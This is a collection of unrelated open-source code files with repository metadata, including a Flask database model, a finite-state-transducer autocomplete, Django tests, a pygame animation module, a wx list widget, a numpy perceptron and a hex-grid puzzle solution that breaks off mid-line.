complaint_date = db.Column(db.DateTime, nullable=True)
created_at = db.Column(
db.DateTime, nullable=False, default=datetime.datetime.utcnow
)
def serialize(self):
return {
"id": str(self.id),
"notification_id": str(self.notification_id),
"service_id": str(self.service_id),
"service_name": self.service.name,
"ses_feedback_id": str(self.ses_feedback_id),
"complaint_type": self.complaint_type,
"complaint_date": get_dt_string_or_none(self.complaint_date),
"created_at": self.created_at.strftime(DATETIME_FORMAT),
}
class ServiceDataRetention(db.Model):
__tablename__ = "service_data_retention"
id = db.Column(UUID(as_uuid=True), primary_key=True, default=uuid.uuid4)
service_id = db.Column(
UUID(as_uuid=True),
db.ForeignKey("services.id"),
unique=False,
index=True,
nullable=False,
)
service = db.relationship(
Service,
backref=db.backref(
"data_retention",
collection_class=attribute_mapped_collection("notification_type"),
),
)
notification_type = db.Column(notification_types, nullable=False)
days_of_retention = db.Column(db.Integer, nullable=False)
created_at = db.Column(
db.DateTime, nullable=False, default=datetime.datetime.utcnow
)
updated_at = db.Column(
db.DateTime, nullable=True, onupdate=datetime.datetime.utcnow
)
__table_args__ = (
UniqueConstraint(
"service_id", "notification_type", name="uix_service_data_retention"
),
)
def serialize(self):
return {
"id": str(self.id),
"service_id": str(self.service_id),
"service_name": self.service.name,
"notification_type": self.notification_type,
"days_of_retention": self.days_of_retention,
"created_at": self.created_at.strftime(DATETIME_FORMAT),
"updated_at": get_dt_string_or_none(self.updated_at),
}
class WebauthnCredential(db.Model):
"""
A table that stores data for registered webauthn credentials.
"""
__tablename__ = "webauthn_credential"
id = db.Column(
UUID(as_uuid=True), primary_key=True, nullable=False, default=uuid.uuid4
)
user_id = db.Column(UUID(as_uuid=True), db.ForeignKey("users.id"), nullable=False)
user = db.relationship(User, backref=db.backref("webauthn_credentials"))
name = db.Column(db.String, nullable=False)
# base64 encoded CBOR. used for logging in. https://w3c.github.io/webauthn/#sctn-attested-credential-data
credential_data = db.Column(db.String, nullable=False)
# base64 encoded CBOR. used for auditing. https://www.w3.org/TR/webauthn-2/#authenticatorattestationresponse
registration_response = db.Column(db.String, nullable=False)
created_at = db.Column(
db.DateTime, nullable=False, default=datetime.datetime.utcnow
)
updated_at = db.Column(
db.DateTime, nullable=True, onupdate=datetime.datetime.utcnow
)
def serialize(self):
return {
"id": str(self.id),
"user_id": str(self.user_id),
"name": self.name,
"credential_data": self.credential_data,
"created_at": self.created_at.strftime(DATETIME_FORMAT),
"updated_at": get_dt_string_or_none(self.updated_at),
}
class Agreement(db.Model):
__tablename__ = "agreements"
id = db.Column(
UUID(as_uuid=True), primary_key=True, default=uuid.uuid4, unique=False
)
type = db.Column(db.String(3), nullable=False, unique=True, index=True)
partner_name = db.Column(db.String(255), nullable=False, unique=True, index=True)
status = db.Column(db.String(255), nullable=False, unique=True, index=True)
start_time = db.Column(db.DateTime, nullable=True)
end_time = db.Column(db.DateTime, nullable=True)
url = db.Column(db.String(255), nullable=False, unique=True, index=True)
budget_amount = db.Column(db.Float, nullable=True)
organization_id = db.Column(
UUID(as_uuid=True),
db.ForeignKey("organization.id"),
nullable=True,
)
def serialize(self):
return {
"id": str(self.id),
"type": self.type,
"partner_name": self.partner_name,
"status": self.status,
"start_time": self.start_time.strftime(DATETIME_FORMAT),
"end_time": self.end_time.strftime(DATETIME_FORMAT),
"budget_amount": self.budget_amount,
"organization_id": self.organization_id,
}
| GSA/notifications-api | app/models.py | models.py | py | 78,608 | python | en | code | 7 | github-code | 13 |
37031745149 | import networkx as nx
from fst.classes import State
from fst.utils import findMaxWordSize, findMinimizedState
def create_minimal_transducer(dictionary):
# Initial
fst = nx.MultiDiGraph()
minimal_states = []
max_word_size = findMaxWordSize(dictionary)
# print(max_word_size)
temp_states = []
for i in range(0, max_word_size + 1):
temp_state = State(i)
temp_states.append(temp_state)
# Algorithm
prev_word = ""
current_word = ""
index = 1
for word in dictionary:
current_word = word
# print(current_word)
# Longest Prefix
prefix_len = 0
while (prefix_len < len(current_word) and prefix_len < len(prev_word) and prev_word[prefix_len] == current_word[prefix_len]):
prefix_len = prefix_len + 1
# Minimize States from Suffix of the Previous Word
for i in range(len(prev_word), prefix_len, -1):
cur_output = temp_states[i-1].output(temp_states[i].name)
# print(cur_output)
temp_states[i-1].remove_edge(temp_states[i].name, prev_word[i-1])
temp_states[i-1].add_edge(findMinimizedState(temp_states[i],
minimal_states, max_word_size).name, prev_word[i-1], cur_output)
temp_states[i].clear()
# Initializes Tail States for the Current Word
for i in range(prefix_len, len(current_word)):
temp_states[i].add_edge(temp_states[i+1].name, current_word[i])
if current_word != prev_word:
temp_states[len(current_word)].set_final(True)
# Fixing Outputs
missing_output = index
for i in range(0, prefix_len+1):
# print(missing_output)
if i == prefix_len:
temp_states[i].set_output(
temp_states[i+1].name, missing_output)
break
cur_output = temp_states[i].output(temp_states[i+1].name)
# print(cur_output)
new_output = min(missing_output, cur_output)
# print(new_output)
temp_states[i].set_output(temp_states[i+1].name, new_output)
dif_output = cur_output - new_output
temp_states[i+1].correct_edges(dif_output)
missing_output = missing_output - new_output
prev_word = current_word
index = index + 1
# Minimizing States for Last Word
for i in range(len(current_word), 0, -1):
cur_output = temp_states[i-1].output(temp_states[i].name)
temp_states[i-1].remove_edge(temp_states[i].name, current_word[i-1])
temp_states[i-1].add_edge(findMinimizedState(temp_states[i],
minimal_states, max_word_size).name, current_word[i-1], cur_output)
temp_states[i].clear()
# Adding starting state
new_state = temp_states[0].copy()
new_state.rename(0)
minimal_states.append(new_state)
# Creating FST based on list
# for stat in minimal_states:
# print("Estado: {}, Final:{}, Edges:{}".format(stat.name, stat.final, len(stat.edges)))
# for edge in stat.edges:
# print("Origem:{}, Destino:{}, Transicao:{}, Output:{}".format(edge.origin, edge.destiny, edge.transition, edge.output))
for state in minimal_states:
state.add_state_to_fst(fst)
for state in minimal_states:
state.add_edges_to_fst(fst)
return fst
# Read Input
def read_input_fst(input, fst):
state = 0
output = 0
for letter in input:
current_state_edges = dict(fst[state])
prev_state = state
for next_state, edge_properties in current_state_edges.items():
for index, edge in edge_properties.items():
if edge['transition'] == letter:
state = next_state
output += edge['output']
break
if (state == prev_state):
print("Nao chegou ao fim")
break
return output
def auto_complete_fst(input, fst):
state = 0
for letter in input:
current_state_edges = dict(fst[state])
prev_state = state
for next_state, edge_properties in current_state_edges.items():
for index, edge in edge_properties.items():
if edge['transition'] == letter:
state = next_state
break
if (state == prev_state):
return "Não existe"
# print(state)
queue = [(state, input)]
autocomplete_list = []
while len(queue) > 0 and len(autocomplete_list) < 5:
current_pair = queue.pop(0)
current_state = current_pair[0]
# print("Atual:{}".format(current_state))
# Adding final words to autocomplete_list
if fst.nodes[current_state]["final"]:
autocomplete_list.append(current_pair[1])
# Adding New States to BFS
current_state_edges = dict(fst[current_state])
for next_state, edge_properties in current_state_edges.items():
for index, edge in edge_properties.items():
# print("Proximo:{}".format(next_state))
queue.append((next_state, current_pair[1]+edge['transition']))
return autocomplete_list
def read_fst():
fst = nx.read_gpickle("generated_fst")
return fst
| RafaelStudartDiPiero/FST_CTC34 | fst/fst.py | fst.py | py | 5,327 | python | en | code | 0 | github-code | 13 |
22907058374 | from django.test import TestCase
from django.contrib.contenttypes.models import ContentType
from survey.tests.utils import SurveyTestCase
from survey.models import (DesiredFact, FactOption,
Fact, has_required_data, Project)
class DesiredFactTests(TestCase):
def setUp(self):
self.content_type = ContentType.objects.all()[0]
self.desired_fact = DesiredFact.objects.create(code='code1',
label='enter data', data_type='T',
required=True, content_type=self.content_type)
def test_choices(self):
FactOption.objects.create(code='1', description='a',
desired_fact=self.desired_fact)
FactOption.objects.create(code='2', description='b',
desired_fact=self.desired_fact)
self.assertEquals([('1', '1-a'), ('2', '2-b')],
self.desired_fact.choices[1:])
class FactTests(SurveyTestCase):
def setUp(self):
super(FactTests, self).setUp()
self.login()
def _set_desired_fact_data_type(self, _type):
self.desired_fact.data_type = _type
self.desired_fact.save()
def test_data_type_text(self):
data = 'hi there'
self._set_desired_fact_data_type('T')
fact = self._save_fact(data)
self.assertEquals(data, fact.typed_data)
def test_data_type_int(self):
data = '12'
self._set_desired_fact_data_type('I')
fact = self._save_fact(data)
self.assertEquals(12, fact.typed_data)
def test_data_type_float(self):
data = '12.2'
self._set_desired_fact_data_type('F')
fact = self._save_fact(data)
self.assertEquals(12.2, fact.typed_data)
def test_data_type_yes_no(self):
data = '01'
self._set_desired_fact_data_type('Y')
fact = self._save_fact(data)
self.assertEquals(True, fact.typed_data)
def test_data_type_select(self):
fo = FactOption.objects.create(desired_fact=self.desired_fact, code='12')
data = '12'
self._set_desired_fact_data_type('S')
fact = self._save_fact(data)
self.assertEquals(fo, fact.typed_data)
def test_existing_facts(self):
self._save_fact('01')
existing_facts = dict(Fact.existing_facts(self.survey, self.subject).items())
self.assertEquals({'code1': '01'}, existing_facts)
def test_existing_facts_with_prefix(self):
self._save_fact('01')
existing_facts = dict(Fact.existing_facts(
self.survey, self.subject, 'prefix').items())
self.assertEquals({'prefix-code1': '01'}, existing_facts)
class SubjectTests(SurveyTestCase):
def setUp(self):
super(SubjectTests, self).setUp()
self.login()
def test_survey_with_no_desired_facts(self):
self.desired_fact.delete()
self.assertTrue(has_required_data(self.survey, self.subject))
def test_survey_with_non_required_data(self):
self.desired_fact.required = False
self.desired_fact.save()
self.assertTrue(has_required_data(self.survey, self.subject))
def test_survey_with_required_data(self):
self.assertFalse(has_required_data(self.survey, self.subject))
Fact.objects.create(survey=self.survey, subject=self.subject,
desired_fact=self.desired_fact, data='1', created_by=self.user,
updated_by=self.user)
self.assertTrue(has_required_data(self.survey, self.subject))
def test_survey_with_mixed_data(self):
DesiredFact.objects.create(code='code2',
label='enter data', data_type='T',
required=False, content_type=self.content_type)
self.assertFalse(has_required_data(self.survey, self.subject))
Fact.objects.create(survey=self.survey, subject=self.subject,
desired_fact=self.desired_fact, data='1', created_by=self.user,
updated_by=self.user)
self.assertTrue(has_required_data(self.survey, self.subject))
class SurveyTests(SurveyTestCase):
def test_survey_content_types(self):
self.assertEquals(
[ContentType.objects.get_for_model(Project)],
self.survey.content_types())
| gareth-lloyd/flexsurvey | survey/tests/test_models.py | test_models.py | py | 4,220 | python | en | code | 0 | github-code | 13 |
41858059866 | class Node:
def __init__(self, cords, reward):
self.type = 'normal'
self.cords = cords
self.is_wall = False
self.is_door = False
self.door = ''
self.key = ''
self.diamond = ''
self.is_wired = False
self.v = 0
self.r = reward
self.pi = 0
self.available = True
| msmsd778/AI_Game_RL | src/python_client/MainClass.py | MainClass.py | py | 377 | python | en | code | 0 | github-code | 13 |
22139695329 | import turtle
a = 10
x = 0
y = 0
turtle.shape('turtle')
for i in range(10):
for j in range(4):
turtle.forward(a)
turtle.left(90)
turtle.penup()
a += 10
x -= 5
y -= 5
turtle.goto(x, y)
turtle.pendown()
| Andrey-phystech/mipt_python_1sem | lab_1/ex5.py | ex5.py | py | 262 | python | en | code | 0 | github-code | 13 |
31728286520 | """
Animation module, including spritesheet
and animation frame classes
Written Dec 29, 2015 by Benjamin Reed
Credit for original spritesheet implementation
goes to Paul Vincent Craven at
programarcadegames.com
"""
import pygame as pyg
import constants as con
class RectWithType(pyg.Rect):
"""
Class representing a collision rect with
a type flag defining what kind of collision
it is used for.
Type flag legend:
'Sprite' : Sprite/surface collision
'Vuln' : Attack vulnerability region ("hurtbox")
'Atk' : Attack collision region ("hitbox")
"""
def __init__(self, rect):
super(RectWithType, self).__init__(rect[1], rect[2], rect[3], rect[4])
self.type = rect[0]
def flip_horizontal(self, frame_width):
"""
Horizontally reflects rect location within
frame coordinate system along line (x=frame_width/2)
"""
# Calculate flipping axis as frame median
flip_axis = frame_width/2
# Determine whether or not rect overlaps the
# flipping axis
# If it does, calculate distance from axis
# to right edge and reassign rect x-origin
# to axis minus that distance
if flip_axis in range (self.x, self.right+1):
offset = self.right - flip_axis
self.x = flip_axis - offset
# If no overlap, determine if rect lies to
# the left or the right of the axis
else:
if self.right < flip_axis:
offset = flip_axis - self.right
self.x = flip_axis + offset
elif self.x > flip_axis:
offset = self.x - flip_axis
self.right = flip_axis - offset
class AnimationFrame(pyg.sprite.Sprite):
"""
Class representing a frame of animation
and its associated collision rects
(Alternate implementation: Has multiple
lists of rects separated by type flag.
The idea is to minimize the number of
rects you have to iterate thru per
frame and/or event to check for different
types of collision.
"""
def __init__(self, name, axis, image, rects):
"""
Constructs an AnimationFrame from the
image + RectWithType data passed in
"""
super(AnimationFrame, self).__init__()
self.image = image
self.axis = axis
# Total frame dimensions -- used to determine
# drawing coordinates
self.rect = self.image.get_rect()
self.rect.x = 50
self.rect.y = 50
self.name = name
self.vuln_rects = []
self.atk_rects = []
# Sprite rect is always the first rect
# member following the frame's name
# There is ONLY ever one sprite rect
# per frame (I think; this may change)
self.sprite_rect = rects[0]
# Remaining rects are added to different
# lists based on their type flag
for x in range (1, len(rects)):
if rects[x].type == "Vuln":
self.vuln_rects.append(rects[x])
elif rects[x].type == "Atk":
self.atk_rects.append(rects[x])
class SpriteSheet(object):
"""
Class used to grab images out of a sprite sheet.
"""
def __init__(self, file_name):
"""
Construct a SpriteSheet from image at file
path (file_name) and convert
"""
self.sprite_sheet = pyg.image.load(file_name).convert()
def get_image(self, x, y, width, height):
"""
Grab a single image out of the sprite_sheet image
Parameters: (x,y) for origin of frame you wish to
slice, and (width, height) for the dimensions of
your desired slice
"""
image = pyg.Surface([width, height]).convert()
image.blit(self.sprite_sheet, (0,0), (x, y, width, height))
# Set transparency color key
image.set_colorkey(con.ALPHA_COLOR)
return image | benreed/pyg-fg-hello-rect-collision | animation.py | animation.py | py | 4,130 | python | en | code | 0 | github-code | 13 |
6669293011 | import json
from jupyter_server.base.handlers import APIHandler
from jupyter_server.utils import url_path_join
import tornado
import os
class RouteHandler(APIHandler):
# The following decorator should be present on all verb methods (head, get, post,
# patch, put, delete, options) to ensure only authorized user can request the
# Jupyter server
@tornado.web.authenticated
def get(self):
course = os.environ.get('COURSE', 'NO COURSE')
user = os.environ.get('JUPYTERHUB_USER', 'NOBODY')
self.finish(json.dumps({
'course': course,
'user': user,
}))
def setup_handlers(web_app):
host_pattern = ".*$"
base_url = web_app.settings["base_url"]
route_pattern = url_path_join(base_url, "csci-env", "get_env")
handlers = [(route_pattern, RouteHandler)]
web_app.add_handlers(host_pattern, handlers)
| csci-env/env-extension | csci_env/handlers.py | handlers.py | py | 888 | python | en | code | 0 | github-code | 13 |
35024601841 | import os
import re
# Set the path to the input file
input_file = "dr-glas.txt"
# Create a directory to store the output files
output_dir = "dr_glas/kapitel"
os.makedirs(output_dir, exist_ok=True)
reg = '([0-9]{1,2}\s(?:juni|juli|augusti|september|oktober).*)\n\n'
# Open the input file and read the contents
with open(input_file, "r") as f:
file = f.read()
entries = re.split(reg, file)
entry_array = []
for i, entry in enumerate(entries):
if(i % 2):
if(i == len(entries)):
break
entry_array.append((entries[i].strip().strip("."),entries[i + 1]))
# Iterate over the entries and write each one to a separate file
for entry in entry_array:
output_file = os.path.join(output_dir, f"{entry[0]}.txt")
with open(output_file, "w") as f:
f.write(entry[1])
| joelfalk1/doktor-glas | scripts/date_separator.py | date_separator.py | py | 817 | python | en | code | 0 | github-code | 13 |
74087812179 | # CRISTIAN ECHEVERRÍA RABÍ
import weakref
import wx
from wx.lib.newevent import NewEvent
#-----------------------------------------------------------------------------------------
__all__ = ['ListCtrl', 'LISTCTRL_DEF_STYLE', 'EVTC_LISTCTRL_DATACHANGE']
#-----------------------------------------------------------------------------------------
myEvent, EVTC_LISTCTRL_DATACHANGE = NewEvent()
LISTCTRL_DEF_STYLE = wx.LC_VRULES|wx.LC_SINGLE_SEL
#-----------------------------------------------------------------------------------------
class ListCtrl(wx.ListCtrl):
def __init__(self, parent, headers, size=(-1,-1), style=LISTCTRL_DEF_STYLE):
"""
headers : Headers objects list
size : ListCtrl size
style : ListCtrl styles
"""
style = wx.LC_VIRTUAL|wx.LC_REPORT|style
wx.ListCtrl.__init__(self, parent, -1, size=size, style=style)
self.SetImageList(wx.ImageList(1, 1))
ctrl = weakref.proxy(self)
for i, header in enumerate(headers):
header.insert(i, ctrl)
self.headers = headers
self.attrs = [None, None]
self._selected = None
self._currentSort = None
self.Bind(wx.EVT_LIST_ITEM_SELECTED, self._onItemSelected, self)
self.Bind(wx.EVT_LIST_ITEM_ACTIVATED, self._onItemActivated, self)
self.Bind(wx.EVT_LIST_ITEM_DESELECTED, self._onItemDeselected, self)
self.Bind(wx.EVT_LIST_COL_CLICK, self._onColClick, self)
#-------------------------------------------------------------------------------------
# Métodos sobreescritos
def SetImageList(self, imageList, which=wx.IMAGE_LIST_SMALL):
# Se sobreescribe SetImageList para guardar referencia a la lista de imagenes
self._imageList = imageList
wx.ListCtrl.SetImageList(self, self._imageList, which)
# Métodos personalizables de la lista virtual
def OnGetItemText(self, row, col):
return self._data.toString(row, self.headers[col])
def OnGetItemImage(self, row):
return -1
def OnGetItemAttr(self, row):
return self.attrs[row % 2]
#-------------------------------------------------------------------------------------
# Métodos públicos
def SortByCol(self, col=None):
# No modifica __currentSort
# Si col es None se repite último sort
if col is None:
col = self._currentSort
if not(col is None):
self._data.sortByHeader(self.headers[col])
self.UpdateView()
def UpdateView(self):
""" Normalmente este método no requiere sobreescritura
"""
nr = len(self._data)
self.SetItemCount(nr)
if nr <=0:
self.selection = None
else:
ini = self.GetTopItem()
fin = ini + 1 + self.GetCountPerPage()
self.RefreshItems(ini, fin)
if self.selection is None:
self.selection = 0
elif self.selection > nr - 1:
self.selection = nr - 1
else:
# Necesario para forzar repintado de la selección
self.selection = self.selection
self.Refresh()
#-------------------------------------------------------------------------------------
# Propiedad data
@property
def data(self):
return self._data
@data.setter
def data(self, value):
self._data = value
self._currentSort = None
self.SortByCol()
evt = myEvent(idx=self.GetId(), ctrl=self)
self.GetEventHandler().ProcessEvent(evt)
#-------------------------------------------------------------------------------------
# Propiedad selection y eventos asociados
@property
def selection(self):
return self._selected
@selection.setter
def selection(self,item=None):
if not(item is None):
if len(self._data) > item:
self.SetItemState(item, wx.LIST_STATE_SELECTED,#|wx.LIST_STATE_FOCUSED,
wx.LIST_STATE_SELECTED)#|wx.LIST_STATE_FOCUSED)
self.EnsureVisible(item)
else:
item = None
self._selected = item
#-------------------------------------------------------------------------------------
# Propiedad selectedItem
@property
def selectedItem(self):
if self._selected is None:
return None
else:
return self._data[self._selected]
#-------------------------------------------------------------------------------------
# Eventos
def _onItemSelected(self, event):
self._selected = event.GetIndex()
event.Skip()
def _onItemActivated(self, event):
self._selected = event.GetIndex()
event.Skip()
def _onItemDeselected(self, event):
self._selected = None
event.Skip()
def _onColClick(self, event):
col = event.GetColumn()
if col == self._currentSort:
self._data.reverse()
else:
self._data.sortByHeader(self.headers[col])
self._currentSort = col
self.UpdateView()
event.Skip() | cer1969/py-cer-widgets | listctrl/listctrl.py | listctrl.py | py | 5,512 | python | en | code | 1 | github-code | 13 |
24090946202 | from django.urls import path
# Create urls here
from apencil.api.views import (
# Authentication
SignUpEndpoint,
SignInEndpoint,
BookViewSet,
)
urlpatterns = [
# Auth
path("sign-up/", SignUpEndpoint.as_view(), name="sign-up"),
path("sign-in/", SignInEndpoint.as_view(), name="sign-in"),
# Book
path("books/", BookViewSet.as_view({"get": "list", "post": "create",}), name="book"),
path(
"books/<str:name>/",
BookViewSet.as_view(
{
"get": "retrieve",
"put": "update",
"patch": "partial_update",
"delete": "destroy",
}
),
name="book",
),
] | iamshaynez/apencil | apiserver/apencil/api/urls.py | urls.py | py | 703 | python | en | code | 0 | github-code | 13 |
24984459289 | import os
import jieba
from pyltp import NamedEntityRecognizer, Segmentor, \
Postagger, CustomizedSegmentor, \
Parser, SementicRoleLabeller, SentenceSplitter
class HLT(object):
def __init__(self, model_path):
self.model_path = model_path
self.cws_model_file = os.path.join(self.model_path, 'cws.model')
self.pos_model_file = os.path.join(self.model_path, 'pos.model')
self.ner_model_file = os.path.join(self.model_path, 'ner.model')
self.par_model_file = os.path.join(self.model_path, 'parser.model')
self.srl_model_file = os.path.join(self.model_path, 'pisrl_win.model')
def seg(self, txt):
# 分词
segmentor = Segmentor() # 初始化实例
segmentor.load(self.cws_model_file) # 加载模型
words = segmentor.segment(txt) # 分词
words_list = list(words) # words_list列表保存着分词的结果
segmentor.release() # 释放模型
return words_list
def pos(self, txt):
# 词性标注
postagger = Postagger() # 初始化实例
postagger.load(self.pos_model_file) # 加载模型
postags = postagger.postag(txt) # 词性标注
postags_list = list(postags) # postags_list保存着词性标注的结果
postagger.release() # 释放模型
return postags_list
def net(self, word, post):
# 命名实体识别
recognizer = NamedEntityRecognizer() # 初始化实例
recognizer.load(self.ner_model_file) # 加载模型
netags = recognizer.recognize(word, post) # 命名实体识别
netags_list = list(netags) # netags_list保存着命名实体识别的结果
recognizer.release() # 释放模型
return netags_list
# def par(self, word, post):
# parser = Parser() # 初始化实例
# parser.load(self.par_model_file) # 加载模型
# arcs = parser.parse(word, post) # 句法分析
#
# rely_id = [arc.head for arc in arcs]
# relation = [arc.relation for arc in arcs]
# heads = ['ROOT' if id == 0 else word[id - 1] for id in rely_id]
# # print([(word[arc.head - 1], arc.relation, word[i]) for i, arc in enumerate(arcs)])
# # # print(heads)
# for i in range(len(word)):
# print(relation[i] + '(' + word[i] + ', ' + heads[i] + ')')
# parser.release() # 释放模型
#
# return arcs
# def srl(self, word, post, arcs):
# labeller = SementicRoleLabeller() # 初始化实例
# labeller.load(self.srl_model_file) # 加载模型
# # arcs 使用依存句法分析的结果
# roles = labeller.label(word, post, arcs) # 语义角色标注
# for role in roles:
# tmp = ["%s:[%d %d] %s" % (arg.name, arg.range.start, arg.range.end,
# ''.join(word[arg.range.start:arg.range.end])) for arg in role.arguments]
#
# # print(word[role.index], role.index, "".join(tmp))
# labeller.release() # 释放模型
def start(self, txt):
w_list, p_list, n_list = [], [], []
words_list = self.seg(txt)
# words_list = self.cus_seg(txt)
postags_list = self.pos(words_list)
netags_list = self.net(words_list, postags_list)
w_len = len(words_list)
for i in range(w_len):
# print(words_list[i], postags_list[i], netags_list[i])
if netags_list[i] != 'O':
# 分词结果
w_list.append(words_list[i])
# 词性标注结果
p_list.append(postags_list[i])
# 命名实体识别结果
n_list.append(netags_list[i])
a1 = len(w_list)
# 提取机构名
i = 0
orignizations = []
while i < a1:
if n_list[i] == 'S-Ni':
orignizations.append(w_list[i])
elif n_list[i] == 'B-Ni':
temp_s = ''
temp_s += w_list[i]
j = i + 1
while j < a1 and (n_list[j] == 'I-Ni' or n_list[j] == 'E-Ni'):
temp_s += w_list[j]
j += 1
orignizations.append(temp_s)
i += 1
# 删除重重出现的机构名
return orignizations
if __name__ == '__main__':
model_path = './model/ltp_data_v3.4.0'
txt = '''招标人: 定边县教育和体育局 招标代理机构: 陕西新世纪工程管理咨询有限公司\n地址: 定边县东正街41号县政府大院 地址: 榆林市开发区沙河口市场世纪嘉兴 酒店五楼\n联系人: 陈世军 联系人: 郭秀梅\n电话: 0912-4215408 电话: 0912-2256048\n邮编: 邮编: \n开户银行: 开户银行: 中国银行股份有限公司榆林肤施路支行\n账号: 账号: 103605790456'''
htl = HLT(model_path)
res = htl.start(txt)
print(res)
| imlifeilong/myner | hitner/utils.py | utils.py | py | 5,038 | python | en | code | 0 | github-code | 13 |
6520124361 | import numpy as np
from datasets import encoder_data
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
class TLP():
"""Two layer perceptron class. d is the dimension of input,
M is the dimension of output and h is the number of hidden nodes."""
def __init__(self, d, M, nodes):
self.W = np.random.rand(d+1, nodes)
self.V = np.random.rand(nodes+1, M)
self.Theta = np.zeros([d+1, nodes])
self.Psi = np.zeros([nodes+1, M])
def forward(self, X):
H_star = np.dot(X, self.W)
H = self.activation(H_star)
H = np.concatenate((np.ones(X.shape[0]).reshape(-1, 1), H), axis = 1)
O_star = np.dot(H, self.V)
O = self.activation(O_star)
return H, H_star, O, O_star
def backward(self, T, O,H):
delta_out = (O - T)*self.d_activation(O)
delta_hidden = np.dot(delta_out, self.V[1:].T)*self.d_activation(H[:,1:])
return delta_out, delta_hidden
def fit(self, X, T, epochs, eta = 0.01, alpha = None, verbose = False, plot = True):
"""Backprop algorithm."""
E = np.zeros(epochs)
X = np.concatenate((np.ones(X.shape[0]).reshape(-1, 1), X), axis=1)
for epoch in range(epochs):
H, H_star, O, O_star = self.forward(X)
delta_out, delta_hidden = self.backward(T, O, H)
E[epoch] = 0.5*np.einsum('ij, ij', O-T, O-T)
if verbose and epoch%500==0:
print('error for iteration %i: %f' %(epoch ,E[epoch]))
# if momentum
if alpha:
self.Theta = alpha*self.Theta - (1 - alpha)*np.dot(X.T, delta_hidden)
self.Psi = alpha*self.Psi - (1 - alpha)*np.dot(H.T, delta_out)
self.W = self.W + eta*self.Theta
self.V = self.V + eta*self.Psi
# if no momentum
else:
self.W = self.W - eta*np.dot(X.T, delta_hidden)
self.V = self.V - eta*np.dot(H.T, delta_out)
if plot:
plt.plot(np.arange(epochs), E)
plt.xlabel('Epochs')
plt.ylabel('MSE')
plt.show()
def predict(self, X):
X = np.concatenate((np.ones(N).reshape(-1, 1), X), axis = 1)
H, H_star, O, O_star = self.forward(X)
return H, O
def activation(self, z):
return 2/(1 + np.exp(-z)) - 1
def d_activation(self, a):
"""a is an activation from activation()"""
# todo: is this a good idea?
return 0.5*(1 + a)*(1 - a)
N = 8
X, T = encoder_data(N)
M, d = T.shape
hidden_nodes = 3
epochs = 15000
eta = 0.01
tlp = TLP(d, M, hidden_nodes)
tlp.fit(X, T, epochs, eta, plot = False)
H, Y = tlp.predict(X)
H = H[:, 1:] # remove bias column
print('output: ')
print(np.round(Y))
H_sign = np.sign(H)
print('3D representation: ')
print(H_sign)
print('weight matrix: ')
print(tlp.W)
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.scatter(H_sign[:,0], H_sign[:,1], H_sign[:,2], c = 'r')
plt.savefig()
plt.show()
| AlexHermansson/ANN_lab1 | encoder.py | encoder.py | py | 3,053 | python | en | code | 0 | github-code | 13 |
13514423036 | from ebcli.containers.generic_container import GenericContainer
from ebcli.objects.exceptions import NotFoundError, ValidationError
from mock import patch, Mock
from unittest import TestCase
MOCK_DESTINATION_DOCKERFILE = '/foo'
class TestGenericContainer(TestCase):
def setUp(self):
self.pathconfig = Mock()
self.fs_handler = Mock(pathconfig=self.pathconfig)
self.fs_handler.make_dockerfile = Mock()
self.fs_handler.dockerrun = None
self.container = GenericContainer(self.fs_handler, None, None, None)
def test_validate_no_dockerfile_or_dockerrun(self):
self.pathconfig.dockerfile_exists = lambda: False
self.pathconfig.dockerrun_exists = lambda: False
self.assertRaises(NotFoundError, self.container.validate)
@patch('ebcli.containers.generic_container.dockerrun.validate_dockerrun_v1')
def test_validate_dockerrun_validation_fail(self, validate_dockerrun_v1):
self.pathconfig.dockerfile_exists = lambda: True
validate_dockerrun_v1.side_effect = ValidationError
self.assertRaises(ValidationError, self.container.validate)
def test_containerize(self):
self.pathconfig.dockerfile_exists = lambda: True
container = GenericContainer(self.fs_handler, None, None)
container._containerize()
self.fs_handler.make_dockerfile.assert_called_once_with()
| aws/aws-elastic-beanstalk-cli | tests/unit/containers/test_generic_container.py | test_generic_container.py | py | 1,392 | python | en | code | 150 | github-code | 13 |
37473394734 | EAST = 0
SOUTHEAST = 1
SOUTHWEST = 2
WEST = 3
NORTHWEST = 4
NORTHEAST = 5
NUM_DIRECTIONS = 6
#Tile X == normal x
#Tile Y = zigzagging vertically
#origin is in the right zigzag column
# \ \
# / /
# \ \ v +y ->+x
# / /
def GetTileInDirection(pos, direction):
if direction == EAST:
return (pos[0]+1,pos[1])
elif direction == WEST:
return (pos[0]-1,pos[1])
inRightCol = pos[1]%2==0
if inRightCol:
if direction == SOUTHEAST:
return (pos[0]+1,pos[1]+1)
elif direction == SOUTHWEST:
return (pos[0],pos[1]+1)
elif direction == NORTHWEST:
return (pos[0],pos[1]-1)
elif direction == NORTHEAST:
return (pos[0]+1,pos[1]-1)
else:
if direction == SOUTHEAST:
return (pos[0],pos[1]+1)
elif direction == SOUTHWEST:
return (pos[0]-1,pos[1]+1)
elif direction == NORTHWEST:
return (pos[0]-1,pos[1]-1)
elif direction == NORTHEAST:
return (pos[0],pos[1]-1)
def GetNumAdjacent(flippedTiles, pos):
count = 0
for direction in range(NUM_DIRECTIONS):
testTile = GetTileInDirection(pos, direction)
if testTile in flippedTiles:
count += 1
return count
input = []
with open("input.txt") as FILE:
INPUTSTATE_NORMAL = 0
INPUTSTATE_PENDING_NORTH = 1
INPUTSTATE_PENDING_SOUTH = 2
for line in FILE:
line = line.strip()
if len(line) == 0:
continue
directions = []
inputState = INPUTSTATE_NORMAL
for c in line:
if inputState == INPUTSTATE_NORMAL:
if c == 'e':
directions.append(EAST)
elif c == 'w':
directions.append(WEST)
elif c == 'n':
inputState = INPUTSTATE_PENDING_NORTH
elif c == 's':
inputState = INPUTSTATE_PENDING_SOUTH
elif inputState == INPUTSTATE_PENDING_NORTH:
if c == 'e':
directions.append(NORTHEAST)
elif c == 'w':
directions.append(NORTHWEST)
inputState = INPUTSTATE_NORMAL
elif inputState == INPUTSTATE_PENDING_SOUTH:
if c == 'e':
directions.append(SOUTHEAST)
elif c == 'w':
directions.append(SOUTHWEST)
inputState = INPUTSTATE_NORMAL
input.append(directions)
#Part A
flippedTiles = set()
for directions in input:
currentTile = (0,0)
for direction in directions:
currentTile = GetTileInDirection(currentTile, direction)
if currentTile in flippedTiles:
flippedTiles.remove(currentTile)
else:
flippedTiles.add(currentTile)
print(len(flippedTiles))
#Part B
for i in range(100):
newFlippedTiles = set(flippedTiles)
minX = 0
maxX = 0
minY = 0
maxY = 0
for tile in flippedTiles:
if tile[0] < minX:
